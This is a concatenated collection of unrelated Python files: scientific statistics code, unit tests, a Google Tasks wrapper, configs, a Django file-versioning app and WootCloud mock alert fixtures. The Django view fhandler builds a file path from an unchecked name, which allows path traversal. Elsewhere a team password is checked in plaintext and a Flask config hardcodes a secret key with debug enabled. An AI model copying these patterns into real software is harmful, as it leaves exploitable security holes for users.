similarity = Similarity(sim_func="L2")
super().__init__(encoder, similarity)
|
11481419
|
from __future__ import absolute_import, division, print_function
from scitbx.array_family import flex
import iotbx.phil
import mmtbx.polygon
import libtbx, os, re, sys
from libtbx.utils import Sorry
from libtbx import easy_pickle
from six.moves import range
keys_to_show = ["r_work", "r_free",
"pdb_header_r_work", "pdb_header_r_free",
"r_work_cutoffs", "r_free_cutoffs",
"completeness_in_range", "completeness_d_min_inf", "completeness_6A_inf",
"adp_mean_all", "adp_min_all", "adp_max_all",
"wilson_b", "solvent_content_via_mask",
"bond_rmsd", "bond_max_deviation", "angle_rmsd", "angle_max_deviation",
"dihedral_rmsd", "dihedral_max_deviation",
"planarity_rmsd", "planarity_max_deviation",
"chirality_rmsd", "chirality_max_deviation",
"rama_favored", "rama_allowed", "rama_outliers",
"rotamer_outliers", "clashscore"]
other_numerical_keys = ["high_resolution", "low_resolution",
'adp_min_backbone', 'adp_min_sidechain', 'adp_min_solvent',
'adp_max_backbone', 'adp_max_sidechain', 'adp_max_solvent',
'adp_mean_backbone', 'adp_mean_sidechain', 'adp_mean_solvent',
'unit_cell_volume']
default_keys = ["r_work", "r_free", "adp_mean_all", "bond_rmsd", "angle_rmsd",
"clashscore"]
key_captions = ["R-work", "R-free", "R-work (PDB)", "R-free (PDB)",
"R-work (after cutoff)", "R-free (after cutoff)",
"Completeness in range", "Completeness", "Completeness to 6A",
"Average B", "Minimum B", "Maximum B",
"Wilson B", "Solvent content",
"RMSD(bonds)", "Bonds max.", "RMSD(angles)", "Angles max.",
"RMSD(dihedrals)", "Dihedrals max.", "RMSD(planarity)", "Planarity max",
"RMSD(chirality)", "Chirality max.",
"Ramachandran favored", "Ramachandran allowed", "Ramachandran outliers",
"Rotamer outliers", "Clashscore"]
other_captions = ["High resolution", "Low resolution",
"Min. backbone ADP", "Min. sidechain ADP", "Min. solvent ADP",
"Max. backbone ADP", "Max. sidechain ADP", "Max. solvent ADP",
"Mean backbone ADP", "Mean sidechain ADP", "Mean solvent ADP",
"Unit cell volume"]
assert len(keys_to_show) == len(key_captions)
_selected = []
for key_name in keys_to_show :
if key_name in default_keys :
_selected.append("*%s" % key_name)
else :
_selected.append(key_name)
key_params_str = " ".join(_selected)
captions_str = " ".join([ re.sub(" ", "_", txt) for txt in key_captions ])
polygon_params_str = """\
database_file_name = None
.type = str
.style = noauto
keys_to_show = %s
.type = choice(multi=True)
.short_caption = Statistics to display
.caption = %s
.style = bold hide_label
number_of_histogram_slots = 10
.type = int
.help = Number of histogram slots for the final histogram to be used to \
draw the POLYGON's rays.
.input_size = 64
.style = noauto bold
""" % (key_params_str, captions_str)
all_params_str = """
polygon {
%s
}""" % polygon_params_str
master_params = iotbx.phil.parse(all_params_str)
def select_dict(database_dict, selection):
result = {}
for key in database_dict.keys():
result.setdefault(key, database_dict[key].select(selection))
return result
def filter_and_convert(database_dict, keys):
selection = flex.bool(database_dict[keys[0]].size(), True)
for key in keys+["high_resolution"]:
values = database_dict[key]
selection &= (values != "none")
tmp = select_dict(database_dict = database_dict, selection = selection)
result = {}
for key in keys+["high_resolution"]:
vals = flex.double([float(v) for v in tmp[key]])
result.setdefault(key, vals)
return result
def show_histogram(data, n_slots, smooth = True):
triplets = []
histogram = flex.histogram(data = data, n_slots = n_slots)
l = histogram.data_min()
for i, s in enumerate(histogram.slots()):
r = histogram.data_min() + histogram.slot_width() * (i+1)
triplets.append( [l, r, s] )
print("%8.4f %8.4f %d" % (l, r, s))
l = r
if(smooth):
print("... smooth histogram")
triplets_smooth = []
for i, t in enumerate(triplets):
values = flex.double()
for j in [-1,0,1]:
if(i+j >=0 and i+j < len(triplets)):
values.append(float(triplets[i+j][2]))
triplets_smooth.append((t[0],t[1],flex.mean(values)))
for t in triplets_smooth:
print("%8.4f %8.4f %d" % (t[0], t[1], int("%.0f"%t[2])))
return histogram
def convert_to_histogram(data, n_slots):
histogram = flex.histogram(data=data, n_slots=n_slots)
return histogram
def apply_default_filter(database_dict, d_min, key = "high_resolution"):
d_mins = database_dict["high_resolution"]
offset = 0.1
if(d_min>=3 and d_min<4): offset = 0.2
if(d_min>=4 and d_min<6): offset = 0.5
if(d_min>=6): offset = 1.0
sel = (d_mins>(d_min-offset))
sel &= (d_mins<(d_min+offset))
result = select_dict(database_dict = database_dict, selection = sel)
# Totally ad-hoc manipulation for histograms to make sense and format nicely.
# Perhaps needs to be revised at some point.
sel = flex.bool(sel.count(True), True)
for key in result.keys():
if(key in ["high_resolution"]): continue
vals = result[key]
if(key == "bond_rmsd"):
sel &= vals < 0.05
elif(key == "angle_rmsd"):
sel &= vals < 5.
else:
mean = flex.mean(vals)
sel &= vals > mean/2
sel &= vals < mean*2
if(key == "r_work" or key == "r_free"):
sel &= vals < 0.45
result = select_dict(database_dict=result, selection=sel)
#
return result
def load_db(file_name=None):
if(file_name is None):
file_name = libtbx.env.find_in_repositories(
relative_path = "chem_data/polygon_data/all_mvd.pickle",
test = os.path.isfile)
assert os.path.isfile(file_name)
database_dict = easy_pickle.load(file_name)
# Python 3 pickle fix
# =========================================================================
if sys.version_info.major == 3:
database_dict = easy_pickle.fix_py2_pickle(database_dict)
# =========================================================================
return database_dict
def polygon(params = master_params.extract(), d_min = None,
show_histograms = True, extract_gui_data=False):
database_dict = load_db(file_name=params.polygon.database_file_name)
result = filter_and_convert(
database_dict = database_dict,
keys = params.polygon.keys_to_show)
if(d_min is not None):
result = apply_default_filter(database_dict = result, d_min = d_min)
histograms = []
if extract_gui_data :
for selected_key in params.polygon.keys_to_show:
data = result[selected_key]
histograms.append([selected_key, data]) # XXX: not really histograms!
elif(show_histograms):
for selected_key in params.polygon.keys_to_show:
data = result[selected_key]
print("%s data_points=%d" % (selected_key, data.size()), \
"min/max/mean= %12.4f %12.4f %12.4f"%data.min_max_mean().as_tuple())
n_slots = params.polygon.number_of_histogram_slots
if(n_slots is None):
assert 0
n_slots = data.size()//50
if(n_slots < 5):
for scale in range(25,10,-1):
n_slots = data.size()//scale
if(n_slots >= 10): break
if(n_slots == 0):
raise Sorry("Not enough data selected.")
h = show_histogram(data = data, n_slots = n_slots)
histograms.append([selected_key,h])
return histograms
def get_statistics_percentiles(d_min, stats):
"""
For a given set of statistics, determine their percentile ranking compared
to other crystal structures at similar resolution.
"""
if (d_min is None):
return dict([ (s, None) for s in stats.keys() ])
try :
db = load_db()
except Exception as e :
return {}
d_min_mvd = flex.double([ float(x) for x in db['high_resolution'] ])
sel_perm = flex.sort_permutation(d_min_mvd)
d_min_mvd = d_min_mvd.select(sel_perm)
def find_value_in_list(values, value):
i = 0
j = len(values) - 1
while (i != j):
k = i + (j - i) // 2
if (value and value <= values[k]):
j = k
else :
i = k + 1
return i
index = find_value_in_list(d_min_mvd, d_min)
sel_around = flex.bool(d_min_mvd.size(), False)
index_tmp = index
while (index_tmp > 0):
d_min_other = d_min_mvd[index_tmp]
if (d_min_other < d_min - 0.1):
break
sel_around[index_tmp] = True
index_tmp -= 1
index_tmp = index
while (index_tmp < d_min_mvd.size()):
d_min_other = d_min_mvd[index_tmp]
if (d_min_other > d_min + 0.1):
break
sel_around[index_tmp] = True
index_tmp += 1
#print "%d structures around %g" % (sel_around.count(True), d_min)
percentiles = {}
for stat_name in stats.keys():
stat = stats[stat_name]
if (not stat_name in db):
percentiles[stat_name] = None
continue
values = db[stat_name].select(sel_perm).select(sel_around)
fvalues = flex.double()
for value in values :
try :
fvalues.append(float(value))
except ValueError :
pass
assert fvalues.size() != 0
fvalues_sorted = fvalues.select(flex.sort_permutation(fvalues))
stat_index = find_value_in_list(fvalues_sorted, stat)
# FIXME I think for some of these statistics we need to reverse this -
# i.e. if higher statistics are better
stat_perc = 100 * (1 - (stat_index / fvalues.size()))
percentiles[stat_name] = stat_perc
#print stat_name, stat_index, fvalues.size(), stat_perc
#flex.histogram(fvalues, n_slots=10).show(prefix=" ")
return percentiles
|
11481563
|
import sys, os.path as path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
PROJECT_PATH = path.dirname(path.dirname(path.abspath(__file__)))
from summariser.data_processer.corpus_cleaner import CorpusCleaner
def main():
corpus_name = 'DUC2004' # DUC2001, DUC2002, DUC2004
parse_type = 'parse'
language = 'english'
data_path = path.join(PROJECT_PATH, "../data")
if parse_type is not None and language is None:
raise AttributeError('Please specify language')
corpus = CorpusCleaner(data_path, corpus_name, parse_type, language)
if corpus_name[:3] == 'DUC' or corpus_name[:3] == 'TAC':
corpus.cleanDuc_data(parse_type)
if corpus_name[:3] == 'DBS':
corpus.cleanDBS_data(parse_type)
if corpus_name == 'WikiAIPHES':
corpus.cleanWiki_data(parse_type)
else:
pass
if __name__ == '__main__':
main()
|
11481599
|
import unittest
from mock import Mock, patch, ANY
from pandas import DataFrame
from records_mover.records.schema import RecordsSchema
class TestRecordsSchema(unittest.TestCase):
maxDiff = None
@patch('records_mover.records.schema.schema.sqlalchemy.RecordsSchemaField')
@patch('records_mover.records.schema.schema.sqlalchemy.RecordsSchemaKnownRepresentation')
def test_from_db_table(self,
mock_RecordsSchemaKnownRepresentation,
mock_RecordsSchemaField):
mock_schema_name = Mock(name='schema_name')
mock_table_name = Mock(name='table_name')
mock_driver = Mock(name='driver')
mock_column = Mock(name='column')
mock_table = mock_driver.table.return_value
mock_table.columns = [mock_column]
mock_origin_representation =\
mock_RecordsSchemaKnownRepresentation.from_db_driver.return_value
mock_known_representations = {
'origin': mock_origin_representation,
}
mock_field = mock_RecordsSchemaField.from_sqlalchemy_column.return_value
actual_schema = RecordsSchema.from_db_table(schema_name=mock_schema_name,
table_name=mock_table_name,
driver=mock_driver)
mock_driver.table.assert_called_with(mock_schema_name, mock_table_name)
mock_RecordsSchemaKnownRepresentation.from_db_driver.assert_called_with(mock_driver,
mock_schema_name,
mock_table_name)
mock_RecordsSchemaField.\
from_sqlalchemy_column.assert_called_with(column=mock_column,
driver=mock_driver,
rep_type=mock_origin_representation.type)
self.assertEqual(actual_schema.fields, [mock_field])
self.assertEqual(actual_schema.known_representations,
mock_known_representations)
def test_str(self):
obj = RecordsSchema(fields=[],
known_representations={})
self.assertEqual(str(obj), "RecordsSchema(types={})")
@patch('records_mover.records.schema.schema.sqlalchemy.schema_to_schema_sql')
def test_to_schema_sql(self, mock_schema_to_schema_sql):
mock_driver = Mock(name='driver')
mock_schema_name = Mock(name='schema_name')
mock_table_name = Mock(name='table_name')
obj = RecordsSchema(fields=[],
known_representations={})
out = obj.to_schema_sql(mock_driver,
mock_schema_name,
mock_table_name)
mock_schema_to_schema_sql.assert_called_with(driver=mock_driver,
records_schema=obj,
schema_name=mock_schema_name,
table_name=mock_table_name)
self.assertEqual(out, mock_schema_to_schema_sql.return_value)
@patch('records_mover.records.schema.schema.RecordsSchema')
@patch('records_mover.records.delimited.stream_csv')
def test_from_fileobjs(self,
mock_stream_csv,
mock_RecordsSchema):
mock_fileobj = Mock(name='fileobj')
mock_fileobjs = [mock_fileobj]
mock_records_format = Mock(name='records_format')
mock_processing_instructions = Mock(name='processing_instructions')
mock_fileobj.seekable.return_value = True
mock_reader = mock_stream_csv.return_value.__enter__.return_value
data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846,
'Unnamed: 1': None},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035,
'Unnamed: 1': None},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528,
'Unnamed: 1': None},
]
df = DataFrame.from_dict(data)
mock_reader.get_chunk.return_value = df
out = RecordsSchema.from_fileobjs(mock_fileobjs,
mock_records_format,
mock_processing_instructions)
mock_reader.get_chunk.assert_called_with(mock_processing_instructions.max_inference_rows)
mock_fileobj.seek.assert_called_with(0)
mock_RecordsSchema.from_dataframe.assert_called_with(ANY,
mock_processing_instructions,
include_index=False)
actual_cleaned_up_df = mock_RecordsSchema.from_dataframe.mock_calls[0][1][0]
actual_cleaned_up_df_data = actual_cleaned_up_df.to_dict(orient='records')
expected_cleaned_up_df_data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528},
]
self.assertEqual(actual_cleaned_up_df_data, expected_cleaned_up_df_data)
self.assertEqual(out,
mock_RecordsSchema.from_dataframe.return_value.
refine_from_dataframe.return_value)
@patch('records_mover.records.schema.schema.RecordsSchema')
@patch('records_mover.records.delimited.stream_csv')
def test_from_fileobjs_no_max_inference_rows(self,
mock_stream_csv,
mock_RecordsSchema):
mock_fileobj = Mock(name='fileobj')
mock_fileobjs = [mock_fileobj]
mock_records_format = Mock(name='records_format')
mock_processing_instructions = Mock(name='processing_instructions')
mock_processing_instructions.max_inference_rows = None
mock_fileobj.seekable.return_value = True
mock_reader = mock_stream_csv.return_value.__enter__.return_value
data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846,
'Unnamed: 1': None},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035,
'Unnamed: 1': None},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528,
'Unnamed: 1': None},
]
df = DataFrame.from_dict(data)
mock_reader.read.return_value = df
out = RecordsSchema.from_fileobjs(mock_fileobjs,
mock_records_format,
mock_processing_instructions)
mock_fileobj.seek.assert_called_with(0)
mock_RecordsSchema.from_dataframe.assert_called_with(ANY,
mock_processing_instructions,
include_index=False)
actual_cleaned_up_df = mock_RecordsSchema.from_dataframe.mock_calls[0][1][0]
actual_cleaned_up_df_data = actual_cleaned_up_df.to_dict(orient='records')
expected_cleaned_up_df_data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528},
]
self.assertEqual(actual_cleaned_up_df_data, expected_cleaned_up_df_data)
self.assertEqual(out,
mock_RecordsSchema.from_dataframe.return_value.
refine_from_dataframe.return_value)
@patch('records_mover.records.schema.schema.pandas.refine_schema_from_dataframe')
def test_refine_from_dataframe(self,
mock_refine_schema_from_dataframe):
mock_fields = Mock(name='fields')
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
mock_df = Mock(name='df')
mock_processing_instructions = Mock(name='processing_instructions')
out = schema.refine_from_dataframe(mock_df, mock_processing_instructions)
mock_refine_schema_from_dataframe.\
assert_called_with(records_schema=schema,
df=mock_df,
processing_instructions=mock_processing_instructions)
self.assertEqual(out, mock_refine_schema_from_dataframe.return_value)
def test_cast_dataframe_types(self):
mock_field_a = Mock(name='field_a')
mock_fields = [mock_field_a]
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
mock_df = Mock(name='df')
out = schema.cast_dataframe_types(mock_df)
mock_df.apply.assert_called()
self.assertEqual(out, mock_df.apply.return_value)
def test_cast_dataframe_types_no_fields(self):
mock_fields = []
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
mock_df = Mock(name='df')
out = schema.cast_dataframe_types(mock_df)
self.assertEqual(out, mock_df.apply.return_value)
def test_assign_dataframe_names_no_index(self):
data = [{'a': 1}]
df = DataFrame.from_dict(data)
mock_field_a = Mock(name='field_a')
mock_field_a.name = 'mya'
mock_fields = [mock_field_a]
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
out = schema.assign_dataframe_names(False, df)
self.assertEqual(out.to_dict(orient='records'), [{'mya': 1}])
def test_assign_dataframe_names_with_index(self):
data = [{'b': 1}]
df = DataFrame.from_dict(data)
self.assertEqual(df.to_dict(orient='index'), {0: {'b': 1}})
mock_field_a = Mock(name='field_a')
mock_field_a.name = 'mya'
mock_field_b = Mock(name='field_b')
mock_field_b.name = 'myb'
mock_fields = [mock_field_a, mock_field_b]
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
out = schema.assign_dataframe_names(True, df)
self.assertEqual(out.to_dict(orient='records'), [{'myb': 1}])
self.assertEqual(out.to_dict(orient='index'), {'mya': {'myb': 1}})
|
11481621
|
from __future__ import absolute_import
import re
from contextlib import contextmanager
import gtasks.timeconversion as tc
from gtasks.gtaskobject import GtaskObject
from gtasks.misc import raise_for_type
from gtasks.tasklist import TaskList
class Task(GtaskObject):
LIST_REGEX = re.compile(r'lists/(\w+)/tasks')
def __init__(self, task_dict, gtasks):
GtaskObject.__init__(self, task_dict, gtasks)
list_id = Task.LIST_REGEX.search(task_dict['selfLink']).group(1)
if list_id in gtasks._list_index:
self.task_list = gtasks._list_index[list_id]
else:
list_dict = {'id': list_id, 'selfLink': gtasks.LISTS_URL+'/'+list_id}
self.task_list = TaskList(list_dict, gtasks)
task_id = task_dict['id']
self.task_list._task_index[task_id] = self
gtasks._task_index[task_id] = self
self._parent_settings = self.task_list
self._update_params = {'task': task_id, 'tasklist': list_id}
def unhide(self):
self._set_property('hidden', False)
@contextmanager
def batch_edit(self):
old_value = self._auto_push
self._auto_push = False
yield
self.push_updates()
self._auto_push = old_value
# hidden property (read-only)
@property
def hidden(self):
return self._get_property('hidden') is True
# notes property
@property
def notes(self):
return self._get_property('notes')
@notes.setter
def notes(self, value):
self._set_property('notes', value, str)
# complete property
@property
def complete(self):
return self._get_property('status') == 'completed'
@complete.setter
def complete(self, value):
raise_for_type(value, bool)
if value:
self._set_property('status', 'completed')
else:
self._set_property('completed', None, push_override=False)
self._set_property('status', 'needsAction')
# due_date property
@property
def due_date(self):
date = self._get_property('due')
if date is not None:
date = tc.from_date_rfc3339(date)
return date
@due_date.setter
def due_date(self, value):
if value is None:
self._set_property('due', None)
else:
self._set_property('due', tc.to_date_rfc3339(value))
# completion_date property
@property
def completion_date(self):
date = self._get_property('completed')
if date is not None:
date = tc.from_rfc3339(date)
return date
@completion_date.setter
def completion_date(self, value):
if value is None:
self._set_property('status', 'needsAction', push_override=False)
self._set_property('completed', None)
else:
self._set_property('status', 'completed', push_override=False)
self._set_property('completed', tc.to_rfc3339(value))
# deleted property
@property
def deleted(self):
return self._get_property('deleted') is True
@deleted.setter
def deleted(self, value):
self._set_property('deleted', value, bool)
# parent property
@property
def parent(self):
parent_id = self._get_property('parent')
if parent_id:
return self._gtasks.get_task(parent_id)
else:
return None
def __unicode__(self):
mark = u'\u2713' if self.complete else u' ' # u2713 is a checkmark
return u'({}) {}'.format(mark, self.title)
|
11481642
|
import unittest
from three_words import checkio
class Tests(unittest.TestCase):
TESTS = {
"Basics": [
{"input": "Hello World hello", "answer": True},
{"input": "He is 123 man", "answer": False},
{"input": "1 2 3 4", "answer": False},
{"input": "bla bla bla bla", "answer": True},
{"input": "Hi", "answer": False},
],
"Extra": [
{
"input": "one two 3 four five 6 seven eight 9 ten eleven 12",
"answer": False,
},
{"input": "one two 3 four 5 six 7 eight 9 ten eleven 12", "answer": False},
{
"input": "one two 3 four five six 7 eight 9 ten eleven 12",
"answer": True,
},
{"input": "1231 321 3123 12312 3231 321 312 3123 1231", "answer": False},
{"input": "sda das das dsa adfs dfasd fas", "answer": True},
{"input": "0 qwerty iddqd asdfg ", "answer": True},
{"input": "0 qwerty a asdfg 2", "answer": True},
{"input": "0 qwerty 99999999999 asdfg 2", "answer": False},
{"input": "qwe fds 32 khh wwewe 123 uiu 8794", "answer": False},
],
}
def test_Basics(self):
for i in self.TESTS['Basics']:
assert checkio(i['input']) == i['answer'], i['input']
def test_Extra(self):
for i in self.TESTS['Extra']:
assert checkio(i['input']) == i['answer'], i['input']
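# --- Reference sketch (added; not the original checkio implementation) ---
# The cases above expect checkio(text) to be True exactly when the text contains
# at least three consecutive purely alphabetic words. A minimal version consistent
# with these tests:
#
#     def checkio(words: str) -> bool:
#         streak = 0
#         for word in words.split():
#             streak = streak + 1 if word.isalpha() else 0
#             if streak == 3:
#                 return True
#         return False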
if __name__ == "__main__": # pragma: no cover
unittest.main()
|
11481696
|
from os import path
# App details
BASE_DIRECTORY = path.abspath(path.dirname(__file__))
DEBUG = True
SECRET_KEY = 'keep_it_like_a_secret'
# Database details
SQLALCHEMY_DATABASE_URI = '{0}{1}'.format('sqlite:///',
path.join(BASE_DIRECTORY, 'app.db'))
|
11481716
|
import contextlib
import cProfile
import io
import pstats
from collections.abc import MutableMapping
from functools import wraps
from typing import Any, Callable, Dict
def suppress_print(func: Callable) -> Callable:
"""
Function decorator to suppress print output for testing purposes.
If ``suppress_print: False`` is part of the ``**kwargs`` of the
wrapped method the output won't be suppressed.
"""
@wraps(func)
def wrapped(*args: Any, **kwargs: Any) -> Any:
if not kwargs.pop("suppress_print", True):
return func(*args, **kwargs)
trap = io.StringIO()
with contextlib.redirect_stdout(trap), contextlib.redirect_stderr(trap):
result = func(*args, **kwargs)
return result
return wrapped
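# --- Usage sketch (added; not part of the original module) ---
#     @suppress_print
#     def noisy() -> int:
#         print("this is swallowed")
#         return 42
#
#     noisy()                        # returns 42, output suppressed
#     noisy(suppress_print=False)    # returns 42, output printed normally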
def merge_dicts(d1: Dict, d2: Dict) -> Dict:
"""
Update two dicts of dicts recursively, if either mapping has leaves
that are non-dicts, the second's leaf overwrites the first's.
Taken from: https://stackoverflow.com/a/24088493/3511979
"""
for k, v in d1.items():
if k in d2:
if all(isinstance(e, MutableMapping) for e in (v, d2[k])):
d2[k] = merge_dicts(v, d2[k])
d3 = d1.copy()
d3.update(d2)
return d3
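# --- Usage sketch (added; not part of the original module) ---
#     merge_dicts({"a": {"x": 1}, "b": 1}, {"a": {"y": 2}, "b": 2})
#     # -> {"a": {"x": 1, "y": 2}, "b": 2}  (nested dicts merged, leaves from d2 win)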
@contextlib.contextmanager
def profile() -> None:
"""
Profiler that operates as a context manager. Example usage:
.. code-block:: python
with profile():
foo()
bar()
"""
pr = cProfile.Profile()
pr.enable()
yield
pr.disable()
pstats.Stats(pr).sort_stats("cumulative").print_stats()
|
11481719
|
from hubcommander.auth_plugins.enabled_plugins import AUTH_PLUGINS
# Define the organizations that this Bot will examine.
ORGS = {
"Real_Org_Name_here": {
"aliases": [
"some_alias_for_your_org_here"
],
"public_only": False, # False means that your org supports Private repos, True otherwise.
"new_repo_teams": [ # This is a list, so add all the teams you want to here...
{
"id": "0000000", # The team ID for the team that you want new repos to be attached to
"perm": "push", # The permission, either "push", "pull", or "admin"...
"name": "TeamName" # The name of the team here...
}
]
}
}
# github API Version
GITHUB_VERSION = "application/vnd.github.v3+json" # Is this still needed?
# GITHUB API PATH:
GITHUB_URL = "https://api.github.com/"
# You can use this to add/replace fields from the command_plugins dictionary:
USER_COMMAND_DICT = {
# This is an example for enabling Duo 2FA support for the "!SetDefaultBranch" command:
# "!SetDefaultBranch": {
# "auth": {
# "plugin": AUTH_PLUGINS["duo"],
# "kwargs": {}
# }
#}
}
|
11481783
|
import hashlib
import os
from django.shortcuts import render, redirect
from django.contrib import messages, auth
from django.contrib.auth.decorators import login_required
from django.core.files.storage import FileSystemStorage
from users.forms import RegistrationForm, TeamRegistrationForm
from users.models import File, FileGroup, Member, Team
def fhandler(request, name):
path = "/".join(os.path.dirname(os.path.realpath(__file__)).split("/")[:-1])
new_path = path + "/media/" + name
with open(new_path, "rb") as f:
text = f.read()
print(text)
return render(
request, "users/file.html", {"text": text.decode("utf-8"), "name": name}
)
def index(request):
return render(request, "users/index.html")
def register(request):
if request.method == "POST":
form = RegistrationForm(request.POST)
if form.is_valid():
            form.save()
messages.success(request, "You have been successfully registered!")
return redirect("login")
else:
form = RegistrationForm()
return render(request, "users/register.html", {"form": form})
@login_required(login_url="/login/")
def teamregister(request):
if request.method == "POST":
form = TeamRegistrationForm(request.POST)
if form.is_valid():
            team = form.save()
            team.members.add(request.user)
messages.success(request, "Your team has been successfully registered!")
return redirect("dashboard")
else:
form = TeamRegistrationForm()
return render(request, "users/team_create.html", {"form": form})
@login_required(login_url="/login/")
def teamjoin(request):
if request.method == "POST":
teamname = request.POST["teamname"]
password = request.POST["password"]
team_qs = Team.objects.filter(name=teamname, password=password)
if team_qs: # if query set exists, add logged in user to the team
team = team_qs[0]
team.members.add(request.user)
messages.success(
request, f"You have been successfully added to {team.name}!"
)
return redirect("dashboard")
else:
messages.error(
request,
"Unable to add you to team! Please recheck team name and password",
)
return render(request, "users/team_join.html")
def login(request):
if request.method == "POST":
username = request.POST["username"]
password = request.POST["password"]
user = auth.authenticate(username=username, password=password)
if user:
auth.login(request, user)
messages.success(request, "You have successfully logged in")
return redirect("dashboard")
else:
messages.error(request, "Invalid Credentials")
return redirect("login")
return render(request, "users/login.html")
@login_required(login_url="/login/")
def upload(request):
context = {}
if request.method == "POST":
uploaded_file = request.FILES["document"]
if not check_title_presence(uploaded_file):
messages.success(request, "New file save successfully.")
path = save_on_server(uploaded_file)
hash_val = hash_file(path)
form = File(title=uploaded_file.name, hash_val=hash_val, user=request.user)
form.save()
file_group_form = FileGroup(title=uploaded_file.name, user=request.user)
file_group_form.save()
file_group_form.files.add(form)
else:
# flash message that A similar file is already present if hash value matches
path = save_on_server(uploaded_file)
hash_val = hash_file(path)
if check_file_presence(hash_val):
messages.warning(request, "A similar file is already present")
os.remove(path)
# hash value matches so no need to upload. if not, upload it with different file name
else:
file_group = FileGroup.objects.filter(title=uploaded_file.name)[0]
# save file on server with new name{version}
title = path.split("/")[-1]
form = File(title=title, hash_val=hash_val, user=request.user)
form.save()
file_group.files.add(
form
) # adds newly created file version to file group
messages.warning(
request,
"file with same name is already present adding it with new version ",
)
return render(request, "users/upload.html", context)
@login_required(login_url="/login/")
def dashboard(request):
teams = Member.objects.filter(user__id__in=[request.user.id])
context = {}
files = FileGroup.objects.filter(user__id__in=[request.user.id])
context = {"files": files, "teams": teams}
print(context["teams"])
return render(request, "users/dashboard.html", context)
def logout(request):
auth.logout(request)
messages.success(request, "You have been logged out")
return render(request, "users/logout.html")
def hash_file(filename):
""""This function returns the SHA-1 hash
of the file passed into it"""
# make a hash object
h = hashlib.sha1()
with open(filename, "rb") as file:
# loop till the end of the file
chunk = 0
while chunk != b"":
# read only 1024 bytes at a time
chunk = file.read(1024)
h.update(chunk)
# return the hex representation of digest
return h.hexdigest()
def check_title_presence(uploaded_file):
"""
query database for filename and if it is present then return True else return False
"""
file = File.objects.filter(title=uploaded_file)
if file:
return True
return False
def check_file_presence(hash_val):
"""
checks if a file exists with the same hash value
"""
file = File.objects.filter(hash_val=hash_val)
if file:
return True
return False
def save_on_server(uploaded_file):
"""
this method saves the file, using a new unique name if already present
"""
fs = FileSystemStorage()
name = fs.save(uploaded_file.name, uploaded_file)
url = fs.url(name)
path = "/".join(os.path.dirname(os.path.realpath(__file__)).split("/")[:-1])
return path + url
|
11481826
|
from pathlib import Path
from lightflow.workflows import list_workflows
from lightflow.config import Config
def test_list_workflows_when_no_workflow_dirs_in_config():
config = Config()
config.load_from_dict({'workflows': []})
assert list_workflows(config) == []
def test_list_workflows_handles_missing_parameters():
config = Config()
workflows_path = str(Path(__file__).parent / 'fixtures/workflows')
config.load_from_dict({'workflows': [workflows_path]})
assert 'parameters_workflow' in {wf.name for wf in list_workflows(config)}
|
11481829
|
from django.contrib import admin
from .models.team import CoreTeam, ProjectTeam, Team
from .models.team_member import CoreMember, ProjectMember, TeamMember
admin.site.register(CoreTeam)
admin.site.register(ProjectTeam)
admin.site.register(Team)
admin.site.register(CoreMember)
admin.site.register(ProjectMember)
admin.site.register(TeamMember)
|
11481881
|
from WootCloud import fetch_incidents, Client, fetch_single_alert
MOCK_URL = 'https://api_mock.wootcloud.com'
MOCK_START = '2019-06-25T08:00:00Z'
MOCK_END = '2019-06-27T08:00:00Z'
MOCK_HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Host': 'api.wootuno.wootcloud.com'
}
MOCK_PKT_ALERT = {
"id": "eyJpIjoiU05XT09UQVBQUFJPRDAxXzEzMzIxNThfMDAwIiwidCI6IjIwMTktMDYtMjZUMjA6MjQ6MjZaIn0=",
"timestamp": "2019-06-26T20:24:26Z",
"severity": "warning",
"category": "Adminstrator Privilege gain attempted",
"signature": "ET POLICY IP Check Domain (whatismyip in HTTP Host)",
"source": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "192.168.1.193",
"latitude": -1,
"longitude": -1,
"mac": "cc:cc:cc:bc:7c:01",
"network": "internal",
"port": 61079,
"state": "Unknown",
"subnet": "192.168.1.0/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5b4c3c91072c98142d308c31",
"asset": "managed",
"managed": "true",
"category": "mobile_phone",
"control": "user",
"host_name": "Shahabs-iPhone",
"os": "ios",
"os_version": "12.1.4",
"ownership": "corporate",
"total_risk": 18.188051551163394,
"type": "smart phone",
"username": "",
"managed_info": {
"host_name": "Shahabs-iPhone"
}
}
},
"destination": {
"city": "Cambridge",
"continent": "North America",
"country": "United States",
"ip": "192.168.1.22",
"latitude": 42.3626,
"longitude": -71.0843,
"mac": "cc:cc:cc:cc:c3:c0",
"network": "external",
"port": 80,
"state": "Massachusetts",
"subnet": "",
"time_zone": "America/New_York",
"zip": "02142",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"payload": ""
}
ANOMALY_ALERT = {
"id": "eyJpIjoibWxub2RlX3AwMDhfY2F0LGY4OjJkOjdjOjJmOjQzOjdjLHVua==",
"timestamp": "2019-05-02T08:00:00Z",
"anomaly_type": "bytes_received",
"signature": "60 (minutes) 'bytes_received'",
